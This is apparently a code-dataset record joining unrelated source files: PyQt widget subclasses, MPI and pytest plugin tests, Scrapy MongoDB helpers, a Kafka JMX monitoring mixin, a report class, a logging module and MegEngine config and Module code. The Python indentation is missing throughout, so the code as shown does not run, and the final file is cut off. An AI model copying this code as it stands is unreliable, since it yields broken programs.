self.setElideMode(QC.Qt.ElideNone)
# Override setTabText to emit a signal whenever it is called
def setTabText(self, index, text):
# Emit signal
self.tabTextChanged.emit(index, text)
# Call super method
return(super().setTabText(index, text))
# Create custom QTableView class
class QTableView(QW.QTableView, QWidget):
pass
# Create custom QTabWidget class
class QTabWidget(QW.QTabWidget, QWidget):
"""
Defines the :class:`~QTabWidget` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QTabWidget` class.
"""
# Signals
currentIndexChanged = QC.Signal(int)
currentTextChanged = QC.Signal(str)
currentWidgetChanged = QC.Signal(QW.QWidget)
tabTextChanged = QC.Signal(int, str)
tabWasInserted = QC.Signal([int], [int, str], [int, QW.QWidget])
tabWasRemoved = QC.Signal(int)
# Override constructor to connect some signals
def __init__(self, *args, browse_tabs=False, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Set up the tab widget
self.init(browse_tabs)
# This function sets up the tab widget
def init(self, browse_tabs):
# Set default tabbar
self.setTabBar(QTabBar())
# Connect signals
self.currentChanged.connect(self.currentIndexChanged)
self.currentChanged.connect(
lambda index: self.currentTextChanged.emit(self.tabText(index)))
self.currentChanged.connect(
lambda index: self.currentWidgetChanged.emit(self.widget(index)))
# Check if a browse menu was requested
if browse_tabs:
# Create a menu containing all available tabs
browse_menu = QMenu('Browse', parent=self)
browse_menu.aboutToShow.connect(self.update_browse_menu)
self.browse_menu = browse_menu
# Create a toolbutton for browsing all available tabs
browse_but = QToolButton()
browse_but.setText('V')
browse_but.setToolTip("Browse tabs")
browse_but.setMenu(browse_menu)
browse_but.setPopupMode(browse_but.InstantPopup)
self.browse_but = browse_but
# Set browse button as the left corner widget
self.setCornerWidget(browse_but, QC.Qt.TopLeftCorner)
# This function updates the browse menu
def update_browse_menu(self):
"""
Updates the browse menu that shows all available tabs.
"""
# Remove all actions currently in the browse menu
self.browse_menu.clear()
# Loop over all available tabs
for i, name in enumerate(self.tabNames()):
# Create a toggleable action for this tab
tab_act = QAction(
self, name,
icon=self.tabIcon(i),
tooltip=self.tabToolTip(i),
toggled=lambda *args, index=i: self.setCurrentIndex(index))
# If this tab is currently selected, check it
tab_act.setChecked(self.currentIndex() == i)
# Add action to menu
self.browse_menu.addAction(tab_act)
# Override addTab to automatically translate the given tab name
def addTab(self, widget, label, icon=None):
# Call super method
if icon is None:
return(super().addTab(widget, label))
else:
return(super().addTab(widget, icon, label))
# Override setTabBar to automatically connect some signals
def setTabBar(self, tabbar):
# Connect the tabTextChanged signals
tabbar.tabTextChanged.connect(self.tabTextChanged)
# Call super method
return(super().setTabBar(tabbar))
# Override tabInserted to emit a signal whenever it is called
def tabInserted(self, index):
# Emit tabWasInserted signal
self.tabWasInserted[int].emit(index)
self.tabWasInserted[int, str].emit(index, self.tabText(index))
self.tabWasInserted[int, QW.QWidget].emit(index, self.widget(index))
# Call super method
super().tabInserted(index)
# Override tabRemoved to emit a signal whenever it is called
def tabRemoved(self, index):
# Emit tabWasRemoved signal
self.tabWasRemoved.emit(index)
# Call super method
super().tabRemoved(index)
# Define function that returns a list of all tab names
def tabNames(self):
return(list(map(self.tabText, range(self.count()))))
# Define function that returns a list of all tab widgets
def tabWidgets(self):
return(list(map(self.widget, range(self.count()))))
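# Hedged usage sketch (editor's addition, assumes a running QApplication):
#     tabs = QTabWidget(browse_tabs=True)
#     tabs.addTab(QWidget(), 'First')
#     tabs.addTab(QWidget(), 'Second')
#     tabs.tabNames()               # -> ['First', 'Second']
# The 'V' corner button opens the browse menu built by update_browse_menu(),
# containing one checkable entry per tab.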
# Create custom QTextEdit class
class QTextEdit(QW.QTextEdit, QWidget):
pass
# Create custom QToolbar class
class QToolBar(QW.QToolBar, QWidget):
"""
Defines the :class:`~QToolBar` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QToolBar` class.
"""
def __init__(self, name, title=None, parent=None):
# Save name
self.name = name
# If title is None, set it to name
if title is None:
title = name
# Call super constructor
super().__init__(title, parent)
# This function retrieves the action of a menu and adds it to the toolbar
def addMenu(self, menu):
# Obtain the action associated with this menu
action = menu.menuAction()
# Add this action
self.addAction(action)
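# Hedged usage sketch (editor's addition, assumes a running QApplication and a
# QMainWindow subclass as `self`; `self.save_project` is a hypothetical slot):
#     file_menu = QMenu('File', parent=self)
#     save_act = QAction(self, '&Save',
#                        shortcut=QG.QKeySequence.Save,
#                        statustip="Save the current project",
#                        triggered=self.save_project)
#     file_menu.addAction(save_act)
#     toolbar = QToolBar('main_toolbar', parent=self)
#     toolbar.addMenu(file_menu)
# Via setDetails(), the action automatically gets the tooltip "Save (Ctrl+S)"
# (the shortcut text depends on the platform).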
# Create custom QToolButton class
class QToolButton(QW.QToolButton, QAbstractButton):
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setAutoRaise(True)
# Create custom QToolTip class
class QToolTip(QW.QToolTip):
pass
``` |
{
"source": "1313e/mpi4pyd",
"score": 2
} |
#### File: MPI/tests/test_MPI.py
```python
from types import BuiltinMethodType, MethodType
# Package imports
import numpy as np
import pytest
# mpi4pyd imports
from mpi4pyd import MPI
from mpi4pyd.dummyMPI import COMM_WORLD as d_comm
from mpi4pyd.MPI import (COMM_WORLD as comm, HYBRID_COMM_WORLD as h_comm,
get_HybridComm_obj)
# Get size and rank
rank = comm.Get_rank()
size = comm.Get_size()
# Get method types
m_types = (BuiltinMethodType, MethodType)
# %% PYTEST CLASSES AND FUNCTIONS
# Pytest for get_HybridComm_obj() function
class Test_get_HybridComm_obj(object):
# Test if default input arguments work
def test_default(self):
assert get_HybridComm_obj() is h_comm
# Test if providing comm returns h_comm
def test_comm(self):
assert get_HybridComm_obj(comm) is h_comm
# Test if providing h_comm returns itself
def test_h_comm(self):
assert get_HybridComm_obj(h_comm) is h_comm
# Test if providing d_comm returns itself
def test_d_comm(self):
assert get_HybridComm_obj(d_comm) is d_comm
# Test if providing a comm with size 1 returns d_comm
@pytest.mark.skipif(size == 1, reason="Cannot be pytested in serial")
def test_comm_size_unity(self):
s_comm = comm.Split(comm.Get_rank(), 0)
assert get_HybridComm_obj(s_comm) is d_comm
s_comm.Free()
# Test if providing the wrong object raises an error
def test_invalid_comm(self):
with pytest.raises(TypeError):
get_HybridComm_obj(0)
# Pytest for standard HybridComm obj
@pytest.mark.skipif(size == 1, reason="Pointless to pytest in serial")
class Test_HybridComm_class(object):
# Create fixture for making dummy NumPy arrays
@pytest.fixture(scope='function')
def array(self):
np.random.seed(comm.Get_rank())
return(np.random.rand(size, 10))
# Create fixture for making dummy lists
@pytest.fixture(scope='function')
def lst(self, array):
return(array.tolist())
# Test if h_comm has the same attrs as comm
def test_has_attrs(self):
instance_attrs = dir(comm)
for attr in instance_attrs:
assert hasattr(h_comm, attr)
# Test if all non-overridden attrs in h_comm are the same as in comm
def test_get_attrs(self):
skip_attrs = ['info']
attrs = [attr for attr in dir(comm) if
attr not in (*h_comm.overridden_attrs, *skip_attrs)]
for attr in attrs:
assert getattr(comm, attr) == getattr(h_comm, attr), attr
# Test the attribute setters
def test_set_attrs(self):
# Test if setting a comm attribute raises an error
with pytest.raises(AttributeError):
h_comm.rank = 1
# Test if a new attribute can be created and read
h_comm.pytest_attr = 'test'
assert h_comm.pytest_attr == 'test'
# Test if this attribute is not in comm
assert not hasattr(comm, 'pytest_attr')
# Test the attribute deleters
def test_del_attrs(self):
# Test if deleting a comm attribute raises an error
with pytest.raises(AttributeError):
del h_comm.rank
# Test if deleting a new attribute can be done
del h_comm.pytest_attr
assert not hasattr(h_comm, 'pytest_attr')
# Test default broadcast with an array
def test_bcast_array(self, array):
assert np.allclose(comm.bcast(array, 0), h_comm.bcast(array, 0))
# Test default broadcast with a list
def test_bcast_list(self, lst):
assert np.allclose(comm.bcast(lst, 0), h_comm.bcast(lst, 0))
# Test default gather with an array
def test_gather_array(self, array):
g_array1 = comm.gather(array, 0)
g_array2 = h_comm.gather(array, 0)
assert type(g_array1) == type(g_array2)
if not rank:
for array1, array2 in zip(g_array1, g_array2):
assert np.allclose(array1, array2)
# Test default gather with a list
def test_gather_list(self, lst):
g_lst1 = comm.gather(lst, 0)
g_lst2 = h_comm.gather(lst, 0)
assert type(g_lst1) == type(g_lst2)
if not rank:
for lst1, lst2 in zip(g_lst1, g_lst2):
assert np.allclose(lst1, lst2)
# Test default scatter with an array
def test_scatter_array(self, array):
assert np.allclose(comm.scatter(array, 0), h_comm.scatter(array, 0))
# Test default scatter with a list
def test_scatter_list(self, lst):
assert np.allclose(comm.scatter(list(lst), 0),
h_comm.scatter(list(lst), 0))
# Test default send/recv with an array
def test_sendrecv_array(self, array):
if not rank:
comm.send(array, 1, 123)
h_comm.send(array, 1, 456)
else:
assert np.allclose(comm.recv(None, 0, 123),
h_comm.recv(None, 0, 456))
# Test default send/recv with a list
def test_sendrecv_list(self, lst):
if not rank:
comm.send(list(lst), 1, 123)
h_comm.send(list(lst), 1, 456)
else:
assert np.allclose(comm.recv(None, 0, 123),
h_comm.recv(None, 0, 456))
``` |
{
"source": "1313e/pytest-success",
"score": 2
} |
#### File: pytest_passrunner/tests/test_plugin.py
```python
pytest_plugins = ['pytester']
# %% PYTEST CLASSES AND FUNCTIONS
# Test if the default use of the marker works
def test_default(testdir):
# Create a temporary test file
testdir.makepyfile(
"""
import pytest
@pytest.mark.run_on_pass
class Test(object):
def test_a(self):
pass
def test_b(self):
raise Exception
def test_c(self):
pass
""")
# Run tests
result = testdir.runpytest()
# Check if one passed, one failed and one xfailed
result.assert_outcomes(passed=1, failed=1, xfailed=1)
``` |
{
"source": "13161231996/-",
"score": 2
} |
#### File: douyin/utils/tools.py
```python
import pymongo
import json
import random
import time
from scrapy.conf import settings
class DBTools:
'''
Database connection helper class.
'''
host = settings['MONGODB_HOST'] # values taken from the Scrapy settings (shared with the pipelines)
port = settings['MONGODB_PORT']
dbName = settings['MONGODB_DBNAME'] # database name
client = pymongo.MongoClient(host=host, port=port) # connect to MongoDB
tdb = client[dbName]
def __init__(self, name):
print('name:',name)
self.post = self.tdb[name]
def get_db_con(self):
return self.post
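# A minimal usage sketch (hypothetical collection name, assuming the MongoDB
# settings above are configured): obtain a collection handle and insert a document.
#
#   post = DBTools('douyin_videos').get_db_con()
#   post.insert_one({'aweme_id': '123', 'desc': 'demo'})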
class MyTools:
'''
Basic utility helpers.
'''
@staticmethod
def init_device_id():
value = random.randint(1000000000, 9999999999)
return str(value)
@staticmethod
def transform_time(u_time):
timeArray = time.localtime(u_time)
otherStyleTime = time.strftime("%Y/%m/%d %H:%M:%S", timeArray)
return otherStyleTime
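# Worked example (hypothetical epoch value; output depends on the local timezone):
#   MyTools.init_device_id()           -> e.g. '4821937465' (10 random digits)
#   MyTools.transform_time(1577836800) -> '2020/01/01 08:00:00' in UTC+8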
``` |
{
"source": "1316591029/kafka",
"score": 2
} |
#### File: services/monitor/jmx.py
```python
from ducktape.utils.util import wait_until
class JmxMixin(object):
"""This mixin helps existing service subclasses start JmxTool on their worker nodes and collect jmx stats.
A couple things worth noting:
- this is not a service in its own right.
- we assume the service using JmxMixin also uses KafkaPathResolverMixin
"""
def __init__(self, num_nodes, jmx_object_names=None, jmx_attributes=None):
self.jmx_object_names = jmx_object_names
self.jmx_attributes = jmx_attributes or []
self.jmx_port = 9192
self.started = [False] * num_nodes
self.jmx_stats = [{} for x in range(num_nodes)]
self.maximum_jmx_value = {} # map from object_attribute_name to maximum value observed over time
self.average_jmx_value = {} # map from object_attribute_name to average value observed over time
def clean_node(self, node):
node.account.kill_process("jmx", clean_shutdown=False, allow_fail=True)
node.account.ssh("rm -rf /mnt/jmx_tool.log", allow_fail=False)
def start_jmx_tool(self, idx, node):
if self.started[idx-1] or self.jmx_object_names is None:
return
# JmxTool is not particularly robust to slow-starting processes. In order to ensure JmxTool doesn't fail if the
# process we're trying to monitor takes awhile before listening on the JMX port, wait until we can see that port
# listening before even launching JmxTool
def check_jmx_port_listening():
return 0 == node.account.ssh("nc -z 127.0.0.1 %d" % self.jmx_port, allow_fail=True)
wait_until(check_jmx_port_listening, timeout_sec=30, backoff_sec=.1,
err_msg="%s: Never saw JMX port for %s start listening" % (node.account, self))
cmd = "%s kafka.tools.JmxTool " % self.path.script("kafka-run-class.sh", node)
cmd += "--reporting-interval 1000 --jmx-url service:jmx:rmi:///jndi/rmi://127.0.0.1:%d/jmxrmi" % self.jmx_port
for jmx_object_name in self.jmx_object_names:
cmd += " --object-name %s" % jmx_object_name
for jmx_attribute in self.jmx_attributes:
cmd += " --attributes %s" % jmx_attribute
cmd += " | tee -a /mnt/jmx_tool.log"
self.logger.debug("Start JmxTool %d command: %s", idx, cmd)
jmx_output = node.account.ssh_capture(cmd, allow_fail=False)
jmx_output.next()
self.started[idx-1] = True
def read_jmx_output(self, idx, node):
if self.started[idx-1] == False:
return
object_attribute_names = []
cmd = "cat /mnt/jmx_tool.log"
self.logger.debug("Read jmx output %d command: %s", idx, cmd)
for line in node.account.ssh_capture(cmd, allow_fail=False):
if "time" in line:
object_attribute_names = line.strip()[1:-1].split("\",\"")[1:]
continue
stats = [float(field) for field in line.split(',')]
time_sec = int(stats[0]/1000)
self.jmx_stats[idx-1][time_sec] = {name : stats[i+1] for i, name in enumerate(object_attribute_names)}
# do not calculate average and maximum of jmx stats until we have read output from all nodes
if any(len(time_to_stats) == 0 for time_to_stats in self.jmx_stats):
return
start_time_sec = min([min(time_to_stats.keys()) for time_to_stats in self.jmx_stats])
end_time_sec = max([max(time_to_stats.keys()) for time_to_stats in self.jmx_stats])
for name in object_attribute_names:
aggregates_per_time = []
for time_sec in xrange(start_time_sec, end_time_sec + 1):
# assume that value is 0 if it is not read by jmx tool at the given time. This is appropriate for metrics such as bandwidth
values_per_node = [time_to_stats.get(time_sec, {}).get(name, 0) for time_to_stats in self.jmx_stats]
# assume that value is aggregated across nodes by sum. This is appropriate for metrics such as bandwidth
aggregates_per_time.append(sum(values_per_node))
self.average_jmx_value[name] = sum(aggregates_per_time) / len(aggregates_per_time)
self.maximum_jmx_value[name] = max(aggregates_per_time)
def read_jmx_output_all_nodes(self):
for node in self.nodes:
self.read_jmx_output(self.idx(node), node)
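# Usage sketch (hypothetical service class, not part of the original file): the
# mixin is combined with a ducktape Service and a Kafka path resolver, and JMX
# collection is configured through the constructor, e.g.:
#
#   class MonitoredBroker(KafkaPathResolverMixin, JmxMixin, Service):
#       def __init__(self, context, num_nodes):
#           Service.__init__(self, context, num_nodes)
#           JmxMixin.__init__(self, num_nodes,
#                             jmx_object_names=["kafka.server:type=BrokerTopicMetrics,name=MessagesInPerSec"],
#                             jmx_attributes=["OneMinuteRate"])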
``` |
{
"source": "13179607996/commcare-hq",
"score": 2
} |
#### File: inddex/reports/master_data_file.py
```python
from django.utils.functional import cached_property
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from custom.inddex.filters import (
CaseOwnersFilter,
DateRangeFilter,
GapTypeFilter,
RecallStatusFilter,
)
from custom.inddex.food import FoodData
from custom.inddex.ucr_data import FoodCaseData
class MasterDataFileSummaryReport(DatespanMixin, CustomProjectReport, GenericTabularReport):
title = 'Output 1 - Master Data File'
name = title
slug = 'master_data_file'
export_only = False
exportable = True
@property
def fields(self):
return [CaseOwnersFilter, DateRangeFilter, RecallStatusFilter]
@property
def headers(self):
return DataTablesHeader(
*(DataTablesColumn(header) for header in self._food_data.headers)
)
@property
def rows(self):
return self._food_data.rows
@cached_property
def _food_data(self):
return FoodData(
self.domain,
datespan=self.datespan,
case_owners=self.request.GET.get('case_owners'),
recall_status=self.request.GET.get('recall_status'),
)
``` |
{
"source": "1317/RaphaelScriptHelper",
"score": 3
} |
#### File: 1317/RaphaelScriptHelper/log.py
```python
import logging,time
log_filename = r'./log/rg' + time.strftime('_%Y%m%d') + '.log'
logger = logging.getLogger('rg_log')
logger.setLevel(logging.INFO)
# If this module is imported incorrectly (e.g. initialised multiple times), a new handler is added each time, producing duplicate log entries; removing all existing handlers here and re-adding them below avoids that problem.
while logger.hasHandlers():
for i in logger.handlers:
logger.removeHandler(i)
# file log
format='%(asctime)s [%(levelname)s] %(message)s'
date_format= '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=format,datefmt=date_format)
handler = logging.FileHandler(log_filename, encoding='utf-8')
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
def debug(msg, exc_info=False, stack_info=False):
logger.debug(msg,exc_info=exc_info,stack_info=stack_info)
def info(msg, exc_info=False, stack_info=False):
logger.info(msg,exc_info=exc_info,stack_info=stack_info)
def warning(msg, exc_info=False, stack_info=False):
logger.warning(msg,exc_info=exc_info,stack_info=stack_info)
def error(msg, exc_info=False, stack_info=False):
logger.error(msg,exc_info=exc_info,stack_info=stack_info)
def critical(msg, exc_info=False, stack_info=False):
logger.critical(msg,exc_info=exc_info,stack_info=stack_info)
if __name__ == '__main__':
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
``` |
{
"source": "1321024918/MegEngine",
"score": 3
} |
#### File: megengine/_internal/config.py
```python
import collections
import os
from . import mgb as _mgb
_default_device_type = "CUDA"
def set_device_map(logical_dev, physical_dev, device_type=None):
"""map from *logical_dev* to *physical_dev* for future comp node
loading
example::
set_device_map(0, 2, 'CPU') # cpu0 -> cpu2
set_device_map('gpu3', 'gpu0') # gpu3 -> gpu0
:param device_type: specify the device type if devices are given by
integers; if devices are given by integers and ``device_type`` is not
given, the default value ``'CUDA'`` would be used. Possible values are
``'CUDA'`` and ``'CPU'``.
"""
if device_type is None:
device_type = _default_device_type
if device_type == "CUDA":
xpu = "gpu"
else:
assert device_type == "CPU"
xpu = "cpu"
def rmxpu(v):
if isinstance(v, str):
assert v.startswith(xpu) or v.startswith("xpu"), (
"bad comp node in set_device_map: "
"device_type={} comp_node={}".format(device_type, v)
)
return v[3:]
return v
logical_dev, physical_dev = map(rmxpu, [logical_dev, physical_dev])
_mgb.CompNode._set_device_map(device_type, int(logical_dev), int(physical_dev))
def set_default_device(physical_dev, device_type=None):
"""set physical device for xpux
when *device_type* is None and *physical_dev* starts with *gpu* or *cpu*,
the default device type would be modified accordingly for future calls to
:func:`set_device_map` when remapping device number.
"""
global _default_device_type
if (
device_type is None
and isinstance(physical_dev, str)
and not physical_dev.isdigit()
and not physical_dev.startswith("xpu")
):
t = physical_dev[:3]
if t == "gpu":
_default_device_type = "CUDA"
else:
assert t == "cpu", "bad physical_dev: {}".format(physical_dev)
_default_device_type = "CPU"
set_default_device_type(_default_device_type)
device_type = _default_device_type
set_device_map(-1, physical_dev, device_type)
def set_default_device_type(device_type):
"""set device type for xpu"""
global _default_device_type
device_type = device_type.upper()
_mgb.CompNode._set_unspec_device_type(device_type)
_default_device_type = device_type
def set_fork_cuda_warning_flag(flag):
"""set warning to be printed at fork if cuda has been initialized
:type flag: int
:param flag: controls how the warning should be printed:
* 0: disable warning
* 1: print warning to log
* 2: print warning to log and raise exception
"""
_mgb._config.set_fork_cuda_warning_flag(int(flag))
def get_device_count(device_type="xpu", warn=True):
"""get number of devices installed on this system
:param device_type: device type, one of 'xpu', 'gpu' or 'cpu'
:type device_type: str
"""
return _mgb.CompNode._get_device_count(device_type.upper(), warn)
def parse_locator(device_name: str) -> tuple:
"""get the tensor locator expression by device name.
:param device_name: device name, like 'cpu0', 'gpu1' and 'xpux'
:type device_name: str
:return: (device_type, dev_num, stream_num)
"""
return _mgb.CompNode._parse_locator(device_name)
def set_mem_reserve_size(size):
"""set memory reserve size:
* If *size* is greater than 1, it is the absolute amount of memory to
be reserved in MB;
* If *size* is in the range (0, 1), it is the ratio of total memory;
* If *size* is 0, memory reservation and pre-allocation would be
disabled;
* If *size* is -1, disable custom memory allocator and use cuda APIs
directly.
"""
_mgb._config.set_mem_reserve_size(float(size))
def set_comp_graph_option(comp_graph, name, val):
"""set computing graph option and return its old value
:type comp_graph: :class:`.CompGraph`
:param comp_graph: the computing graph whose option should be modified
:type name: str
:param name: option name
Currently supported options are:
* "no_profiling_on_shape_change": bool;
When execution strategy is set to profiling, always use the
initial profile result and do not re-run profiling even if input
shape changes.
* "seq_opt.enable_mem_plan_opt": bool
* "seq_opt.enable_mem_reuse_alloc": bool
* "seq_opt.enable_seq_comp_node_opt": bool
* "force_dynamic_alloc": bool
* "var_sanity_check_first_run": bool
* "enable_sublinear_memory_opt": bool
* "enable_memory_swap": bool; whether to enable memory swap; it
usually performs worse than sublinear memory
* "enable_var_mem_defragment": bool
* "allocate_static_mem_after_graph_compile": bool
* "enable_grad_var_static_reshape": bool:
If set to ``True``, dynamically-shaped gradients whose original
shape is statically inferrable would be reshaped, so static
shape inference can continue
* "async_exec_level": int
* ``0``: do not dispatch asynchronously
* ``1``: async dispatch if there are more than 1 cuda comp
nodes
* mask ``0b10``: async for comp nodes with unlimited queue
(e.g. CPU comp nodes)
* mask ``0b100``: async for even one comp node
* "log_level": int
* ``0``: no log info for graph construction/compiling
* ``1``: static memory allocation status,
WorkspaceLimitGetter summary, and optimizer summary
* ``2``: optimizer details and duplicated operators that are
removed
* "graph_opt.jit": whether to enable JIT
* "graph_opt.tensorrt": whether to enable fine-grained automatic
replacement for TensorRT operators
* "graph_opt.android_nn": whether to enable fine-grained automatic
replacement for Android NN operators
* "graph_opt_level": int
* ``0``: disable
* ``1``: level-1: inplace arith transformations during graph
construction
* ``2``: (default) level-2: level-1, plus global optimization
before graph compiling
* ``3``: also enable JIT
:param val: new option value
:return: old option value
"""
if name == "log_static_mem_alloc":
name = "log_level"
if name == "enable_async_exec":
name = "async_exec_level"
return _mgb._config.set_comp_graph_option(comp_graph, name, int(val))
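# Minimal usage sketch (assumes `cg` is an existing :class:`.CompGraph`):
#
#   old = set_comp_graph_option(cg, "log_level", 1)   # returns the previous value
#   set_comp_graph_option(cg, "graph_opt_level", 3)   # level-2 optimization plus JIT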
def comp_graph_is_eager(comp_graph):
return _mgb._config.comp_graph_is_eager(comp_graph)
def add_extra_vardep(var, dep):
"""add *dep* as an extra dependency of *var*, so if *var* is required to
compute the final output when compiling a comp graph, *dep* would also be
included in the computing sequence. Note that the order computing of these
two vars is not guaranteed.
"""
assert isinstance(var, _mgb.SymbolVar) and isinstance(dep, _mgb.SymbolVar)
assert var.owner_graph == dep.owner_graph
return _mgb._config.add_extra_vardep(var, dep)
class _GraphPropertyBase:
"""helper class for implementing operator property setter context managers"""
_cur_graph = None
_graph2stack = None
"""class attribute that maintains mapping from graph to property stack;
should be defined by child classes"""
__prop_setup__ = None
"""overwritten by subclass to setup property"""
__prop_clear__ = None
"""overwritten by subclass to clear property"""
def __init__(self, comp_graph, prop):
""":param comp_graph: computing graph, or None to not set this
property"""
if comp_graph is not None:
assert isinstance(
comp_graph, _mgb.CompGraph
), "invalid comp graph: {!r}".format(comp_graph)
self._cur_graph = comp_graph
self._graph2stack.setdefault(comp_graph, []).append(prop)
def __setup(self, prop):
self.__prop_setup__(self._cur_graph, prop)
def __clear(self):
self.__prop_clear__(self._cur_graph)
def __enter__(self):
if self._cur_graph is None:
return
stack = self._graph2stack[self._cur_graph]
if len(stack) > 1:
# clear nested property
self.__clear()
self.__setup(stack[-1])
def __exit__(self, exc_type, exc_value, exc_traceback):
if self._cur_graph is None:
return
stack = self._graph2stack[self._cur_graph]
self.__clear()
stack.pop()
if stack:
# restore nested property
self.__setup(stack[-1])
else:
del self._graph2stack[self._cur_graph]
class exc_opr_tracker_scope(_GraphPropertyBase):
"""context manager for associating an object with all operators created
within this context; so when an exception is raised, information about the
corresponding operator could be retrieved from
:attr:`.MegBrainError.tracker`
:param comp_graph: the computing graph where the operators should be tracked
:type comp_graph: :class:`.CompGraph`
:param tracker: an arbitrary python object to track the operators
"""
_graph2stack = {}
def __init__(self, comp_graph, tracker):
assert (
tracker is not None
), "bad args for exc_opr_tracker_scope: {!r} {!r}".format(comp_graph, tracker)
super().__init__(comp_graph, tracker)
__prop_setup__ = staticmethod(_mgb._config.begin_set_exc_opr_tracker)
__prop_clear__ = staticmethod(_mgb._config.end_set_exc_opr_tracker)
class opr_priority_scope(_GraphPropertyBase):
"""context manager for setting priority for all operators created in this
context
:param comp_graph: the computing graph for which operator priority should
be set
:type comp_graph: :class:`.CompGraph`
:param priority: operator priority. Smaller number means higher priority.
Default value is 0. Grad operator would use negative priority by
default.
"""
_graph2stack = {}
LOWEST_PRIORITY = 2 ** 31 - 1
"""lowest priority (i.e. max possible value)"""
HIGHEST_PRIORITY = -LOWEST_PRIORITY
"""highest priority (i.e. min possible value)"""
def __init__(self, comp_graph, priority):
super().__init__(comp_graph, int(priority))
__prop_setup__ = staticmethod(_mgb._config.begin_set_opr_priority)
__prop_clear__ = staticmethod(_mgb._config.end_set_opr_priority)
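# Usage sketch (assumes `cg` is a :class:`.CompGraph` and `x` a symbolic var of that
# graph): operators created inside the scope get the given priority.
#
#   with opr_priority_scope(cg, -5):
#       y = x * 2  # scheduled ahead of default priority-0 operators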
OprTrackerResult = collections.namedtuple(
"OprTrackerResult", ["msg", "tracker", "grad_tracker"]
)
def get_opr_tracker(cg, var_id):
"""get the tracking object associated with the owner operator of a var
:param cg: the computing graph
:param var_id: id of the var whose owner opr tracker should be found
:return: if no var is found, ``None`` is returned; otherwise return an
:class:`OprTrackerResult` object
"""
assert isinstance(cg, _mgb.CompGraph)
ret = _mgb._config.get_opr_tracker(cg, int(var_id))
if ret is None:
return
return OprTrackerResult(*ret)
def set_opr_sublinear_memory_endpoint(var):
"""set the owner operator of a symvar to be endpoint of sublinear memory
optimizer
:type var: :class:`.SymbolVar`
"""
_mgb._config.set_opr_sublinear_memory_endpoint(var)
def max_size_t():
"""get max value of size_t type on local architecture"""
return _mgb.max_size_t()
def is_cuda_ctx_set():
"""return whether current thread has an active cuda driver context"""
return _mgb._config.is_cuda_ctx_set()
def get_include_path():
"""get include path for building megbrain extensions"""
return os.path.join(os.path.realpath(os.path.dirname(__file__)), "include")
def get_cuda_gencode(only_cap=False):
"""get -gencode options to be passed to nvcc for compiling on local
machine
:param only_cap: if True, return only a list of cuda compute capability
strings (like ``['35', '52']`` )
"""
ret = _mgb._config.get_cuda_gencode().split()
if not only_cap:
ret = " ".join(map("-gencode arch=compute_{0},code=sm_{0}".format, ret))
return ret
def get_cuda_lib_path():
"""get the cuda lib64 path by locating nvcc
"""
return _mgb._config.get_cuda_lib_path()
def get_cuda_include_path():
"""get the cuda include path by locating nvcc, including
parent path and `parent path`/include
"""
return _mgb._config.get_cuda_include_path()
def get_cuda_version():
"""get runtime cuda version
"""
return _mgb._config.get_cuda_version()
def is_local_cuda_env_ok():
"""check whether local cuda environment ok by locating nvcc
"""
return _mgb._config.is_local_cuda_env_ok()
def is_compiled_with_cuda():
"""whether cuda is enabled at compile time"""
return _mgb._config.is_compiled_with_cuda()
def load_opr_library(path):
"""Load an external operator library. This essentially sets megbrain
symbols as public and load the library.
:param path: path to the shared object; if it is None, then only megbrain
symbols are made public.
"""
_mgb._config.load_opr_library(
os.path.realpath(os.path.join(os.path.dirname(__file__), "_mgb.so")), path
)
def dump_registered_oprs():
"""
get all registered oprs, return dict(id, name)
"""
return dict(_mgb._config.dump_registered_oprs())
def create_mm_server(server_addr, port):
"""
create mm server with server address
throw exception if server_addr is already used
"""
return _mgb._config.create_mm_server(server_addr, port)
def group_barrier(server_addr, port, size, rank):
"""
block until all ranks reach this barrier
"""
return _mgb._config.group_barrier(server_addr, port, size, rank)
```
#### File: megengine/module/module.py
```python
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
from typing import Any, Callable, Iterable, Optional, Set, Tuple, Union
import numpy as np
from .._internal.dtype import is_quantize
from ..core import Buffer, Parameter, Tensor
from ..logger import get_logger
from ..utils.hook import HookHandler
logger = get_logger(__name__)
def _expand_structure(key, obj):
if isinstance(obj, (Tensor, Module)):
return [(key, obj)]
elif isinstance(obj, (list, tuple, dict)):
ret = []
if isinstance(obj, dict):
targets = ((k, obj[k]) for k in sorted(obj))
else:
targets = ((str(k), v) for k, v in enumerate(obj))
for k, o in targets:
sub_ret = _expand_structure(k, o)
if sub_ret and not isinstance(k, str):
raise AssertionError(
"keys for Tensor and Module must be str, error key: {}".format(k)
)
for kt, vt in sub_ret:
ret.extend([(key + "." + kt, vt)])
return ret
else:
return []
def _is_parameter(obj):
return isinstance(obj, Parameter)
def _is_buffer(obj):
return isinstance(obj, Buffer)
def _is_module(obj):
return isinstance(obj, Module)
class Module(metaclass=ABCMeta):
"""Base Module class.
"""
def __init__(self):
# runtime attributes
self.training = True
self.quantize_disabled = False
# hooks
self._forward_pre_hooks = OrderedDict()
self._forward_hooks = OrderedDict()
@abstractmethod
def forward(self, inputs):
pass
def register_forward_pre_hook(self, hook: Callable) -> HookHandler:
"""Register a hook to handle forward inputs. `hook` should be a function.
Note that only the positional `inputs` are passed to the hook; keyword
arguments given to ``__call__`` go straight to ``forward``.
:param hook: a function that receives `module` and `inputs`, then returns
a modified `inputs` or `None`.
:return: a handler with :meth:`~.HookHandler.remove` interface to delete the hook.
"""
return HookHandler(self._forward_pre_hooks, hook)
def register_forward_hook(self, hook: Callable) -> HookHandler:
"""Register a hook to handle forward results. `hook` should be a function that
receive `module`, `inputs` and `outputs`, then return a modified `outputs` or `None`.
This method return a handler with :meth:`~.HookHandler.remove` interface to delete the hook.
"""
return HookHandler(self._forward_hooks, hook)
def __call__(self, *inputs, **kwargs):
for hook in self._forward_pre_hooks.values():
modified_inputs = hook(self, inputs)
if modified_inputs is not None:
if not isinstance(modified_inputs, tuple):
modified_inputs = (modified_inputs,)
inputs = modified_inputs
outputs = self.forward(*inputs, **kwargs)
